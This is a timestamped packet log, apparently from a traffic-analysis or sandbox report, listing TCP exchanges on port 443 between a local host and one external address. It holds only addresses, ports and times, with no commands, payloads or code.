Jan 6, 2025 04:43:29.587846041 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:29.587856054 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.588016987 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:29.588021994 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906294107 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906317949 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906400919 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:29.906438112 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906455040 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:29.906836987 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906871080 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906893015 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:29.906898022 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.906918049 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:29.906939983 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.121598959 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.121752977 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.121779919 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.121834040 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.122059107 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.122121096 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.122150898 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.122196913 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.123158932 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.123184919 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.123218060 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.123225927 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.123253107 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.123284101 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.124134064 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.124198914 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.339761972 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.339812994 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.339838028 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.339863062 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.339879990 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.339915991 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.340126038 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.340178013 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.340450048 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.340492964 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.341123104 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.341152906 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.341171980 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.341178894 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.341207027 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.341218948 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.341799021 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.341850042 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.342452049 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.342483997 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.342510939 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.342518091 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.342545986 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.342561960 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.343424082 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.343453884 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.343532085 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.343538046 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.343573093 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.344264030 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.344310999 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.344360113 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.344429970 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.345267057 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.345308065 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.560592890 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.560643911 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.560657978 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.560682058 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.560697079 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.560733080 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.560754061 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.560868025 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.560921907 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561253071 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561306953 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561330080 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561376095 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561690092 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561717033 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561734915 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561742067 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561767101 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561785936 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561799049 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561849117 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561856031 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561894894 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.561897039 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.561944008 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.595793962 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.595809937 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.620502949 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.620541096 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:30.620634079 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.620949030 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:30.620963097 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:31.822853088 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:31.823029041 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:31.823901892 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:31.823911905 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:31.824101925 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:31.824110985 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.159508944 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.159531116 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.159708977 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.159725904 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.160048008 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.160110950 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.160118103 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.160162926 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.161144018 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.161207914 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.164846897 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.164921045 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.250063896 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.250190973 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.250257015 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.250314951 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.250317097 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.250324965 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.250360966 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.250370979 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.251125097 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.251204014 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.251967907 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.252032042 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.252286911 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.252345085 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.253423929 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.253484011 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.253582954 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.253643990 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.255363941 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.255429029 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.340629101 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.340679884 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.340699911 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.340715885 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.340744019 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.340761900 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.340866089 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.340914011 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.341036081 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.341082096 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.341396093 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.341437101 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.341444969 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.341449976 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.341504097 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.341989994 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.342031956 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.342040062 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.342050076 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.342071056 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.342094898 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.342678070 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.342736959 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.342861891 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.342907906 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.343049049 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.343099117 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.343214035 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.343256950 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.343888998 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:32.343939066 CET | 49976 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:32.345879078 CET | 443 | 49976 | 39.103.20.26 | 192.168.2.9
                                                    Jan 6, 2025 04:43:32.345941067 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.430897951 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.430964947 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.430975914 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.430982113 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.431040049 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.431046009 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.431057930 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.431086063 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.431114912 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.432117939 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.432132959 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.463155985 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.463200092 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.463551998 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.463768959 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.463784933 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:33.665642977 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:33.665714979 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:33.666227102 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:33.666235924 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:33.666404009 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:33.666410923 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.002835035 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.002861023 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.002928972 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.002960920 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.003029108 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.003724098 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.003793001 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.004569054 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.004637957 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.004640102 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.004740953 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.004755020 CET4434997739.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.004764080 CET49977443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.015741110 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.015778065 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:34.015873909 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.016098976 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:34.016113043 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.271858931 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.272011995 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.272780895 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.272790909 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.272998095 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.273001909 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.614518881 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.614541054 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.614669085 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.614692926 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.615086079 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.615118980 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.615149021 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.615154982 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.615175962 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.615202904 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.843760014 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.843794107 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.843875885 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.843889952 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.843965054 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.844456911 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.844516039 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.845191002 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.845240116 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.845242023 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.845249891 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.845285892 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.846051931 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.846128941 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:35.846991062 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:35.847044945 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.073993921 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.074037075 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.074115038 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.074126959 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.074162006 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.074182034 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.074342012 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.074398041 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.074995041 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075028896 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075048923 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.075053930 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075068951 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.075093031 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.075802088 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075855970 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.075908899 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075948954 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075965881 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.075968981 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.075979948 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.076000929 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.076854944 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.076909065 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.076931953 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.076977968 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.077950954 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.077982903 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.078005075 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.078007936 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.078018904 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.078020096 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.078048944 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.078052998 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.078077078 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.078104019 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.078836918 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.078887939 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.303272963 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303344011 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303369999 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.303383112 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303397894 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303416014 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.303438902 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.303443909 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303524971 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.303811073 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303867102 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.303913116 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.303960085 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.304044008 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.304100990 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.304476976 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.304528952 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.304529905 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.304538965 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.304572105 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.304586887 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.304653883 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.304702044 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.305288076 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.305335999 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.305450916 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.305478096 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.305502892 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.305506945 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.305516958 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.305629015 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.306034088 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.306085110 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.306108952 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.306137085 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.306154013 CET49978443192.168.2.939.103.20.26
